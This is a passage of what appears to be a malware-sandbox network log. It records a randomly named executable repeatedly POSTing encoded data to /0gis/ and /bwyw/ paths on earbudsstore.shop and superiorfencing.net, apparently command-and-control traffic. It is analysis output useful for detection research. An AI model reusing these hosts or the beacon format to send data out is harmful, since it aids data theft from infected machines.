Nov 29, 2024 03:54:01.576607943 CET	875	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Fri, 29 Nov 2024 02:54:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 20 da aa 5b e8 8e bd 48 71 b0 76 aa 55 e0 a5 13 92 d4 c4 86 84 42 10 71 67 ff fb 02 76 ab 3b f6 65 f3 40 72 ce c9 b9 7d 09 31 bf dc 4c ae 67 fe c3 ad 42 64 c4 2e 4f cc 6a 52 18 e0 4b 4b c5 5c bd 3c 51 ca 61 12 0c d0 6e 59 8b 11 96 40 81 04 24 29 96 96 fa 34 1b 36 7a ef 3b f7 66 22 65 dc c0 6f 19 5d 5b ea a6 91 81 06 14 51 0c 24 0d 19 56 15 28 b8 c4 bc f4 75 6e 2d 8c 96 f8 c8 9b 83 08 5b ea 9a e2 3c 16 89 3c 70 c8 29 92 c4 42 78 4d 21 6e d4 c2 77 85 72 2a 29 60 8d 14 02 86 ad 56 53 3f 0c 27 a9 64 f8 d2 d4 76 73 dd 4e 5d 24 17 29 4c 68 2c f7 6d 7d 5e 7b 82 5f 12 9c 92 83 12 f4 8b 2c 61 56 d5 df 0f 4d cb f3 bc ab 37 31 48 c2 0c a5 a9 14 09 6e a6 44 c4 9a aa 68 fb c8 a6 76 9c cd ac 21 1e 52 3a ce 74 f6 5f 99 4c 6d 7f 4c 66 28 50 a1 08 ce 04 40 96 8a c4 f3 6e f9 f5 db 21 9a 1d 00 45 16 71 c9 5a e2 8d d4 56 60 0d 76 da 83 7d 15 97 97 8c 43 49 05 57 0e 42 29 bf 3e 68 56 5b aa 91 53 8e 44 de 94 22 6e 32 01 cb d3 [TRUNCATED] Data Ascii: 2ab[s0+X:3 [HqvUBqgv;e@r}1LgBd.OjRKK\<QanY@$)46z;f"eo][Q$V(un-[<<p)BxM!nwr*)`VS?'dvsN]$)Lh,m}^{_,aVM71HnDhv!R:t_LmLf(P@n!EqZV`v}CIWB)>hV[SD"n2IKQ>/is[UZ~"mNi55~THg,S^Sz@}oa;N-hAZF=[6jhl~o\|Dost]Gt zSC\|1>v+uaMC,&2 L7q`'(bk3/s\|EEgzG9x_bWwXs@(q.pG?g?EXjgQqpR/?$S;Ls}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49884	194.195.220.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:03.233479023 CET	798	OUT	POST /0gis/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.earbudsstore.shop Origin: http://www.earbudsstore.shop Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.earbudsstore.shop/0gis/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 6a 2f 47 43 41 4c 4c 6d 35 58 36 32 68 4b 76 72 38 63 61 53 4d 75 36 49 45 55 4e 6e 50 42 59 33 69 59 6f 56 70 4d 6d 76 65 58 48 6b 62 41 65 6e 38 38 55 4e 5a 69 39 41 34 73 53 37 71 35 4e 34 63 7a 54 42 51 64 57 56 69 55 4a 6e 4b 51 42 43 65 32 42 66 6c 6a 2b 49 34 45 66 45 4c 46 67 45 69 69 43 78 51 33 35 36 79 6d 4e 42 67 2f 76 52 37 6c 73 6f 38 76 62 42 37 4b 6e 70 30 77 32 59 4d 37 58 48 4a 63 34 43 6f 42 50 72 77 72 50 67 64 30 73 79 70 6f 65 37 44 61 6b 32 49 74 30 75 66 49 68 74 37 62 57 46 36 55 47 79 66 6c 42 46 4c 61 Data Ascii: QtKtUpvP=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPrwrPgd0sypoe7Dak2It0ufIht7bWF6UGyflBFLa
Nov 29, 2024 03:54:04.290468931 CET	876	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Fri, 29 Nov 2024 02:54:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5f 73 a2 30 10 c0 df fb 29 38 1e 3a 77 33 a7 20 6a d5 2b f4 c6 da 6a 71 b0 76 aa 55 e0 a5 13 92 d4 c4 86 84 42 00 f1 e6 be fb 21 f6 aa 37 f6 e5 c2 0c c9 ee 66 77 b3 bf fc 31 bf dc 4c 07 73 ef e1 56 21 32 64 57 67 e6 ae 53 18 e0 2b 4b c5 5c bd 3a 53 ca 66 12 0c d0 7e 58 89 21 96 40 81 04 c4 09 96 96 fa 34 1f d6 ba ef 33 0f 66 22 65 54 c3 6f 29 cd 2c 75 53 4b 41 0d 8a 30 02 92 06 0c ab 0a 14 5c 62 5e fa da b7 16 46 2b 7c e2 cd 41 88 2d 35 a3 38 8f 44 2c 8f 1c 72 8a 24 b1 10 ce 28 c4 b5 4a f8 ae 50 4e 25 05 ac 96 40 c0 b0 d5 a8 eb c7 e1 24 95 0c 5f 99 da be af ca a9 16 c9 45 02 63 1a c9 43 59 9f af 3d c6 2f 31 4e c8 d1 12 f4 cb 34 66 d6 ae be 1f 9a 96 e7 79 47 af 63 10 07 29 4a 12 29 62 5c 4f 88 88 34 55 d1 0e 91 4d ed 34 9b 59 41 3c a6 74 9a a9 fd 5f 99 4c ed b0 4d 66 20 50 a1 08 ce 04 40 96 8a c4 f3 7e f8 f5 db 31 9a 3d 00 45 16 51 c9 5a e2 8d d4 d6 20 03 7b ed d1 bc 1d 97 97 94 43 49 05 57 8e 42 29 bf 3e 68 ee a6 ec 5a 4e 39 12 79 5d 8a a8 ce 04 2c [TRUNCATED] Data Ascii: 2ac_s0)8:w3 j+jqvUB!7fw1LsV!2dWgS+K\:Sf~X!@43f"eTo),uSKA0\b^F+\|A-58D,r$(JPN%@$_EcCY=/1N4fyGc)J)b\O4UM4YA<t_LMf P@~1=EQZ {CIWB)>hZN9y],w[:)R,E=Ud5IKSFit[nUutB?xX7`JO5:>1}aJ"1ttOi7CMtoWz{kXhPKt z[{c*}Gs8D1:M"yl!g=B:#&%bN1lx_oN!:pzuY.ZAH"6mz=o=y#T;)y_dnY/Jvx=w/eg+m6-CC2fjZ>7Zzm0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49890	194.195.220.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:05.898041010 CET	1815	OUT	POST /0gis/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.earbudsstore.shop Origin: http://www.earbudsstore.shop Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.earbudsstore.shop/0gis/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 72 2f 47 78 34 4c 52 42 74 58 37 32 68 4b 6d 4c 38 52 61 53 4e 32 36 49 4d 51 4e 6e 44 37 59 31 4b 59 6f 33 52 4d 6a 64 32 58 65 55 62 41 53 48 38 2f 51 4e 59 6d 39 41 49 6f 53 34 53 35 4e 34 63 7a 54 48 55 64 41 78 32 55 53 6e 4b 54 49 69 65 36 46 66 6c 48 2b 49 67 79 66 45 50 2f 67 33 36 69 44 52 67 33 36 4a 4b 6d 50 68 67 39 6a 78 37 74 73 6f 78 76 62 42 6d 31 6e 71 6f 61 32 62 63 37 48 47 67 71 6f 53 6f 66 63 4b 45 5a 46 52 51 58 30 47 6c 74 5a 72 37 7a 6c 6b 49 31 33 4e 50 46 72 4e 4b 57 44 57 36 66 61 6a 6e 6a 49 77 6d 69 35 35 5a 35 51 47 73 61 31 6e 47 36 79 59 47 58 31 78 39 54 47 36 69 35 2f 75 76 79 76 65 69 43 4b 79 6b 6d 4a 56 33 6e 49 61 54 4d 30 35 54 49 7a 65 53 57 65 7a 46 63 6c 6d 39 4f 46 56 4b 33 6e 6c 46 4b 49 75 57 49 77 59 4f 57 43 55 71 59 34 4e 34 6c 42 76 49 4b 46 4f 68 71 55 4c 75 4a 77 37 7a 64 76 69 2b 6a 41 4e 4b 5a 64 [TRUNCATED] Data Ascii: QtKtUpvP=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zr/Gx4LRBtX72hKmL8RaSN26IMQNnD7Y1KYo3RMjd2XeUbASH8/QNYm9AIoS4S5N4czTHUdAx2USnKTIie6FflH+IgyfEP/g36iDRg36JKmPhg9jx7tsoxvbBm1nqoa2bc7HGgqoSofcKEZFRQX0GltZr7zlkI13NPFrNKWDW6fajnjIwmi55Z5QGsa1nG6yYGX1x9TG6i5/uvyveiCKykmJV3nIaTM05TIzeSWezFclm9OFVK3nlFKIuWIwYOWCUqY4N4lBvIKFOhqULuJw7zdvi+jANKZdCixCgbwuoVhG5kUXB1RjwM+BKfRSH7VS8gpNbwcthNnJ9xIZ7nap1MQWNRs9cbMbeRte3/67Wi6+PN1taItUonwBC2PXIn8YqZjiNVx6ScVyGkijXUEfRpFgfGVxNfBmDPIBqp6+D6Dy6kjfC8v1D3mGza7yLXVvyhjqMq+J7/bj8i2GQVsZsLZjFfLOv2Do7YB3mtfV5crRmxIPmSBwVticCWIM+xKCS/cwg4AlQzwzvRq9s7tZ9VyDiznh2ksJ8N98XuFpvrI6Yp0YwmxFK4MfmQHTapGioE2NOAswYfpXTI9hv8ZQY0I9mYnAcjRLwKKeBI0vleVv7f9A1on2CJfSuXSFYNUQUF57WHtv8SBy8crLXwqyjGvfUT0/inOnmkhI8sOO9dLQ5i02u/YWDKfbTGZaMdeld+FuQHxHrNhC7QjzvxirEVXRisgSUkW6goo6YxF2YyBn+DRIDBpPbdf0Z4lYW7v8QF/pF96wu2k89goQbyL5PyQhwoIMhPN19ipv7ZsOCvYWZ8fmu6M/E1zAgq0tqRTXRVqgSGZsaVqfybtQd5gJAenvORo5SzIAe98NfBYYijEyV5LSODzhJ4LRzVM+qmQawsgg76hoMmQk1F5IImZ8FT6CcysWYtrftMFUTOQrE2uRGmxVPPD57EfCjbjITSGrFx [TRUNCATED]
Nov 29, 2024 03:54:07.132097960 CET	876	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Fri, 29 Nov 2024 02:54:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 32 61 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c b4 55 b7 d0 1d 7b d1 e2 60 ed 54 ab c0 4b 27 24 a9 89 0d 09 85 00 e2 ce fe f7 45 ec 56 77 ec cb e6 81 e4 9c 93 73 fb 12 62 7d b9 99 5c cf fc 87 5b 85 c8 88 5d 9e 58 db 49 61 80 2f 6d 15 73 f5 f2 44 a9 86 45 30 40 bb 65 2d 46 58 02 05 12 90 a4 58 da ea d3 6c d0 e8 be ef dc 9b 89 94 71 03 bf 65 34 b7 d5 75 23 03 0d 28 a2 18 48 1a 32 ac 2a 50 70 89 79 e5 eb dc da 18 2d f1 91 37 07 11 b6 d5 9c e2 22 16 89 3c 70 28 28 92 c4 46 38 a7 10 37 6a e1 bb 42 39 95 14 b0 46 0a 01 c3 b6 d1 d4 0f c3 49 2a 19 be b4 b4 dd 5c b7 53 17 c9 45 0a 13 1a cb 7d 5b 9f d7 9e e0 97 04 a7 e4 a0 04 fd 22 4b 98 bd ed ef 87 a6 15 45 d1 d1 9b 18 24 61 86 d2 54 8a 04 37 53 22 62 4d 55 b4 7d 64 4b 3b ce 66 d5 10 0f 29 1d 67 3a fb af 4c 96 b6 3f 26 2b 14 a8 54 04 67 02 20 5b 45 e2 79 b7 fc fa ed 10 cd 0e 80 22 cb b8 62 2d f1 5a 6a 2b 90 83 9d f6 60 df 96 cb 4b c6 a1 a4 82 2b 07 a1 94 5f 1f 34 b7 5b b6 a3 a0 1c 89 a2 29 45 dc 64 02 56 a7 [TRUNCATED] Data Ascii: 2ac[s0+X:3\U{`TK'$EVwsb}\[]XIa/msDE0@e-FXXlqe4u#(H2Ppy-7"<p((F87jB9FI\SE}["KE$aT7S"bMU}dK;f)g:L?&+Tg [Ey"b-Zj+`K+_4[)EdV-xT})}K_2UZ}"nm7{n~*$3HW:}n8SqX:S0G7bnu#Zn4'0{e0=ax;X:`]z5.pVf;ZA7:X2Edx#~6p1GP"w@m!~egzG9x_bWwXs@(q,KtG?g?eXjg^s)~HvYVV?;U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49896	194.195.220.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:08.548854113 CET	513	OUT	GET /0gis/?QtKtUpvP=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWinawpycNRn/wEPfqmvFpRpTTVHR2CtA1GmAj29Nvoqiw==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.earbudsstore.shop Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:54:09.787300110 CET	1236	IN	HTTP/1.1 200 OK Server: openresty/1.13.6.1 Date: Fri, 29 Nov 2024 02:54:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 35 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED] Data Ascii: 526<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732848849.9703785119&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJRdEt0VXB2UD1hTXJjZy92bjJHL25Wcm5mZHNxdHRUS243bDVJcE43Q3VEaFVPVGoyb2NXclFYa29QSEZibG4xRm1Mb1RhV1k3NEtSb1drWFNaVVNiajJkQzFxV2JaV2luYXdweWNOUm4vd0VQZnFtdkZwUnBUVFZIUjJDdEExR21BajI5TnZvcWl3PT0mdHo9dmYzMFM4ZkhCIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24 [TRUNCATED]
Nov 29, 2024 03:54:09.787339926 CET	250	IN	Data Raw: 6c 59 6e 41 73 61 57 31 68 5a 32 55 76 59 58 42 75 5a 79 77 71 4c 79 6f 37 63 54 30 77 4c 6a 67 73 59 58 42 77 62 47 6c 6a 59 58 52 70 62 32 34 76 63 32 6c 6e 62 6d 56 6b 4c 57 56 34 59 32 68 68 62 6d 64 6c 4f 33 59 39 59 6a 4d 37 63 54 30 77 4c Data Ascii: lYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjciLCAidXJpX2MiOiAiYzgyYyIsICJhcmdzX2MiOiAiNjEzYyIsICJyZWZlcmVyX2MiOiAiZjViZSIsICJhY2NlcHRfYyI6ICI0Y2ZjIn0="; } </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49916	103.230.159.86	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:16.233140945 CET	784	OUT	POST /bwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.superiorfencing.net Origin: http://www.superiorfencing.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.superiorfencing.net/bwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 34 32 45 46 33 48 6c 6a 65 4a 47 53 38 4e 69 33 70 6f 50 33 4e 54 6a 2b 6d 52 59 71 7a 41 2b 61 77 6a 47 5a 32 6f 73 31 4f 5a 43 6b 59 59 5a 57 37 36 47 46 45 66 78 78 38 4e 61 4f 44 47 7a 55 73 35 57 4b 59 49 31 68 53 49 66 66 42 78 56 33 4e 30 78 72 51 61 34 45 35 32 41 54 49 52 4b 72 55 35 56 71 45 36 6a 52 56 78 72 37 63 43 6b 4b 78 4f 57 6b 4d 5a 77 6a 4d 73 79 34 59 45 39 37 66 55 47 32 67 70 5a 46 71 6f 75 63 55 45 43 76 71 44 52 4d 64 59 46 48 71 4e 6e 41 79 59 64 76 43 71 48 43 49 67 78 6e 6a 66 4c 41 78 75 66 38 49 4b 4c 74 49 38 77 53 6a 66 45 3d Data Ascii: QtKtUpvP=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMdYFHqNnAyYdvCqHCIgxnjfLAxuf8IKLtI8wSjfE=
Nov 29, 2024 03:54:17.825119972 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49922	103.230.159.86	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:18.904236078 CET	804	OUT	POST /bwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.superiorfencing.net Origin: http://www.superiorfencing.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.superiorfencing.net/bwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 61 61 77 43 32 5a 33 70 73 31 50 5a 43 6b 54 34 59 63 6c 4b 47 4f 45 66 4e 48 38 49 69 4f 44 47 6e 55 73 38 79 4b 5a 35 31 69 54 59 66 64 41 42 56 31 53 6b 78 72 51 61 34 45 35 32 55 39 49 58 69 72 56 4b 64 71 47 59 48 57 4b 42 72 34 5a 43 6b 4b 31 4f 57 67 4d 5a 78 32 4d 74 65 47 59 48 4a 37 66 56 32 32 67 34 5a 47 39 34 76 32 62 6b 44 43 6b 32 30 2b 62 4b 31 65 6a 73 65 6d 69 49 4a 49 4f 38 32 6f 53 43 35 50 77 2f 6e 34 68 39 58 4c 5a 36 71 45 53 66 67 69 39 49 54 38 52 63 37 49 73 54 67 59 69 59 4c 44 6e 4c 55 53 78 6b 6f 45 Data Ascii: QtKtUpvP=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/n4h9XLZ6qESfgi9IT8Rc7IsTgYiYLDnLUSxkoE
Nov 29, 2024 03:54:20.445648909 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:54:20 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49928	103.230.159.86	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:21.573754072 CET	1821	OUT	POST /bwyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.superiorfencing.net Origin: http://www.superiorfencing.net Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.superiorfencing.net/bwyw/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 53 61 78 30 69 5a 32 4b 55 31 64 4a 43 6b 51 34 59 64 6c 4b 47 58 45 62 68 62 38 49 2f 37 44 45 66 55 71 66 4b 4b 65 4b 74 69 63 59 66 64 4c 68 56 30 4e 30 77 72 51 62 4a 4e 35 32 45 39 49 58 69 72 56 4b 78 71 43 4b 6a 57 5a 52 72 37 63 43 6b 65 78 4f 58 46 4d 5a 6f 42 4d 74 61 57 59 78 35 37 66 31 6d 32 6a 4b 78 47 69 49 76 30 59 6b 44 61 6b 32 77 6c 62 4f 64 53 6a 73 72 42 69 4b 5a 49 4c 4b 65 30 4e 77 52 6a 30 2f 36 62 6e 61 50 61 42 4b 2b 38 55 66 30 43 78 66 47 47 4f 2b 76 6f 67 30 6b 70 72 71 53 74 2f 71 41 6e 32 41 39 78 72 4b 73 67 6c 35 6a 2b 35 69 4e 67 4d 43 67 55 31 70 5a 42 62 65 41 73 7a 65 5a 42 6e 47 73 70 69 68 74 6b 49 2b 61 35 49 73 69 77 67 61 45 34 35 4b 4b 58 6e 53 